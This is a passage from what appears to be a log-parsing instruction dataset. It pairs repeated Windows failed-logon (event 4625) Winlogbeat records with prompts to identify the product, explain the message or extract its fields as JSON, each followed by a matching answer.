\",\"LogonType\":\"3\",\"ProcessId\":\"0x0\",\"ProcessName\":\"-\",\"Status\":\"0xc000006d\",\"SubStatus\":\"0xc000006a\",\"SubjectDomainName\":\"-\",\"SubjectLogonId\":\"0x0\",\"SubjectUserName\":\"-\",\"SubjectUserSid\":\"S-1-0-0\",\"TargetDomainName\":\"SDPB\",\"TargetUserName\":\"alice\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"WorkstationName\":\"IDCSAVIYNT02\"},\"event_id\":\"4625\",\"keywords\":[\"Audit Failure\"],\"opcode\":\"Info\",\"process\":{\"pid\":740,\"thread\":{\"id\":13644}},\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":6082954626,\"task\":\"Logon\"}}", "messagetype": "auth_failure", "productids": [ 6 ], "senderhost": "10.87.1.30", "sensitivity": "normal", "severitylabel": "Info", "sourceinfo": "unknown", "tags": [ "v8", "eventId:4625", "microsoft-windows-security-auditing", "auth_failure" ], "vendorcode": "6082954626", "streamName": "microsoft-windows-security-auditing", "clientIP": "99.159.217.100", "userName": "alice" }
Create a JSON artifact from the message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t99.159.217.100\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"stark","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"99.159.217.100","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}}
Product: Windows Active Directory Vendor: Microsoft
Identify this syslog message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t99.159.217.100\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"stark","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"99.159.217.100","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}}
This is a syslog message from a product called Windows Active Directory by Microsoft. The following fields were extracted from the message: action: Logon clientport: 61238 messagetype: auth_failure productids: [6] senderhost: 10.87.1.30 sensitivity: normal severitylabel: Info sourceinfo: unknown tags: ['v8', 'eventId:4625', 'microsoft-windows-security-auditing', 'auth_failure'] vendorcode: 6082954626 streamName: microsoft-windows-security-auditing clientIP: 99.159.217.100 userName: alice
Explain this syslog message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tbob\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t250.192.142.162\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"oscorp","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"250.192.142.162","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"bob","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}}
{ "action": "Logon", "clientport": 61238, "message": "WitFoo-WinLogBeat ::: {\"@metadata\":{\"beat\":\"winlogbeat\",\"type\":\"_doc\",\"version\":\"8.1.3\"},\"@timestamp\":\"2023-07-17T18:11:48.924Z\",\"agent\":{\"ephemeral_id\":\"4c83ecad-c1b4-4a54-8b3d-8fd365195907\",\"id\":\"8291ec57-310c-4e62-b5bc-e9ba4ac93b35\",\"name\":\"03SDPBSVR03\",\"type\":\"winlogbeat\",\"version\":\"8.1.3\"},\"ecs\":{\"version\":\"8.0.0\"},\"event\":{\"action\":\"Logon\",\"code\":\"4625\",\"created\":\"2023-07-17T18:11:50.394Z\",\"kind\":\"event\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\"},\"host\":{\"name\":\"03SDPBSVR03.SDPB.LOCAL\"},\"log\":{\"level\":\"information\"},\"message\":\"An account failed to log on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nLogon Type:\\t\\t\\t3\\n\\nAccount For Which Logon Failed:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\tbob\\n\\tAccount Domain:\\t\\tSDPB\\n\\nFailure Information:\\n\\tFailure Reason:\\t\\tUnknown user name or bad password.\\n\\tStatus:\\t\\t\\t0xC000006D\\n\\tSub Status:\\t\\t0xC000006A\\n\\nProcess Information:\\n\\tCaller Process ID:\\t0x0\\n\\tCaller Process Name:\\t-\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tIDCSAVIYNT02\\n\\tSource Network Address:\\t250.192.142.162\\n\\tSource Port:\\t\\t61238\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tNtLmSsp \\n\\tAuthentication Package:\\tNTLM\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\n\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\\n\\nThe Process Information fields indicate which account and process on the system requested the logon.\\n\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"organization\":\"oscorp\",\"senderHost\":\"10.87.1.30\",\"sensitivity\":\"normal\",\"winlog\":{\"api\":\"wineventlog\",\"channel\":\"Security\",\"computer_name\":\"03SDPBSVR03.SDPB.LOCAL\",\"event_data\":{\"AuthenticationPackageName\":\"NTLM\",\"FailureReason\":\"%%2313\",\"IpAddress\":\"250.192.142.162\",\"IpPort\":\"61238\",\"KeyLength\":\"0\",\"LmPackageName\":\"-\",\"LogonProcessName\":\"NtLmSsp \",\"LogonType\":\"3\",\"ProcessId\":\"0x0\",\"ProcessName\":\"-\",\"Status\":\"0xc000006d\",\"SubStatus\":\"0xc000006a\",\"SubjectDomainName\":\"-\",\"SubjectLogonId\":\"0x0\",\"SubjectUserName\":\"-\",\"SubjectUserSid\":\"S-1-0-0\",\"TargetDomainName\":\"SDPB\",\"TargetUserName\":\"bob\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"WorkstationName\":\"IDCSAVIYNT02\"},\"event_id\":\"4625\",\"keywords\":[\"Audit Failure\"],\"opcode\":\"Info\",\"process\":{\"pid\":740,\"thread\":{\"id\":13644}},\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":6082954626,\"task\":\"Logon\"}}", "messagetype": "auth_failure", "productids": [ 6 ], "senderhost": "10.87.1.30", "sensitivity": "normal", "severitylabel": "Info", "sourceinfo": "unknown", "tags": [ "v8", "eventId:4625", "microsoft-windows-security-auditing", "auth_failure" ], "vendorcode": "6082954626", "streamName": "microsoft-windows-security-auditing", "clientIP": "250.192.142.162", "userName": "bob" }
Create a JSON artifact from the message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tbob\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t250.192.142.162\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"oscorp","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"250.192.142.162","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"bob","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}}
Product: Windows Active Directory Vendor: Microsoft
Identify this syslog message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\tbob\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t250.192.142.162\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"oscorp","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"250.192.142.162","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"bob","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}}
This is a syslog message from a product called Windows Active Directory by Microsoft. The following fields were extracted from the message: action: Logon clientport: 61238 messagetype: auth_failure productids: [6] senderhost: 10.87.1.30 sensitivity: normal severitylabel: Info sourceinfo: unknown tags: ['v8', 'eventId:4625', 'microsoft-windows-security-auditing', 'auth_failure'] vendorcode: 6082954626 streamName: microsoft-windows-security-auditing clientIP: 250.192.142.162 userName: bob
Explain this syslog message
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t153.202.14.113\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"oscorp","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"153.202.14.113","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}}
{ "action": "Logon", "clientport": 61238, "message": "WitFoo-WinLogBeat ::: {\"@metadata\":{\"beat\":\"winlogbeat\",\"type\":\"_doc\",\"version\":\"8.1.3\"},\"@timestamp\":\"2023-07-17T18:11:48.924Z\",\"agent\":{\"ephemeral_id\":\"4c83ecad-c1b4-4a54-8b3d-8fd365195907\",\"id\":\"8291ec57-310c-4e62-b5bc-e9ba4ac93b35\",\"name\":\"03SDPBSVR03\",\"type\":\"winlogbeat\",\"version\":\"8.1.3\"},\"ecs\":{\"version\":\"8.0.0\"},\"event\":{\"action\":\"Logon\",\"code\":\"4625\",\"created\":\"2023-07-17T18:11:50.394Z\",\"kind\":\"event\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\"},\"host\":{\"name\":\"03SDPBSVR03.SDPB.LOCAL\"},\"log\":{\"level\":\"information\"},\"message\":\"An account failed to log on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nLogon Type:\\t\\t\\t3\\n\\nAccount For Which Logon Failed:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\talice\\n\\tAccount Domain:\\t\\tSDPB\\n\\nFailure Information:\\n\\tFailure Reason:\\t\\tUnknown user name or bad password.\\n\\tStatus:\\t\\t\\t0xC000006D\\n\\tSub Status:\\t\\t0xC000006A\\n\\nProcess Information:\\n\\tCaller Process ID:\\t0x0\\n\\tCaller Process Name:\\t-\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tIDCSAVIYNT02\\n\\tSource Network Address:\\t153.202.14.113\\n\\tSource Port:\\t\\t61238\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tNtLmSsp \\n\\tAuthentication Package:\\tNTLM\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\\n\\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\\n\\nThe Process Information fields indicate which account and process on the system requested the logon.\\n\\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"organization\":\"oscorp\",\"senderHost\":\"10.87.1.30\",\"sensitivity\":\"normal\",\"winlog\":{\"api\":\"wineventlog\",\"channel\":\"Security\",\"computer_name\":\"03SDPBSVR03.SDPB.LOCAL\",\"event_data\":{\"AuthenticationPackageName\":\"NTLM\",\"FailureReason\":\"%%2313\",\"IpAddress\":\"153.202.14.113\",\"IpPort\":\"61238\",\"KeyLength\":\"0\",\"LmPackageName\":\"-\",\"LogonProcessName\":\"NtLmSsp \",\"LogonType\":\"3\",\"ProcessId\":\"0x0\",\"ProcessName\":\"-\",\"Status\":\"0xc000006d\",\"SubStatus\":\"0xc000006a\",\"SubjectDomainName\":\"-\",\"SubjectLogonId\":\"0x0\",\"SubjectUserName\":\"-\",\"SubjectUserSid\":\"S-1-0-0\",\"TargetDomainName\":\"SDPB\",\"TargetUserName\":\"alice\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"WorkstationName\":\"IDCSAVIYNT02\"},\"event_id\":\"4625\",\"keywords\":[\"Audit Failure\"],\"opcode\":\"Info\",\"process\":{\"pid\":740,\"thread\":{\"id\":13644}},\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":6082954626,\"task\":\"Logon\"}}", "messagetype": "auth_failure", "productids": [ 6 ], 